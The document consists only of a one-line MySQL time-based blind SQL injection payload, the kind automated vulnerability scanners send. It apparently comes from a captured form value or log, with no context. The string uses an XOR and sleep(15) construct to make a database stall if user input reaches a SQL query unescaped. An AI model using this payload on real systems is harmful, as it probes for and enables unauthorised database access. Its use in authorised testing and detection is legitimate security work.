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"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z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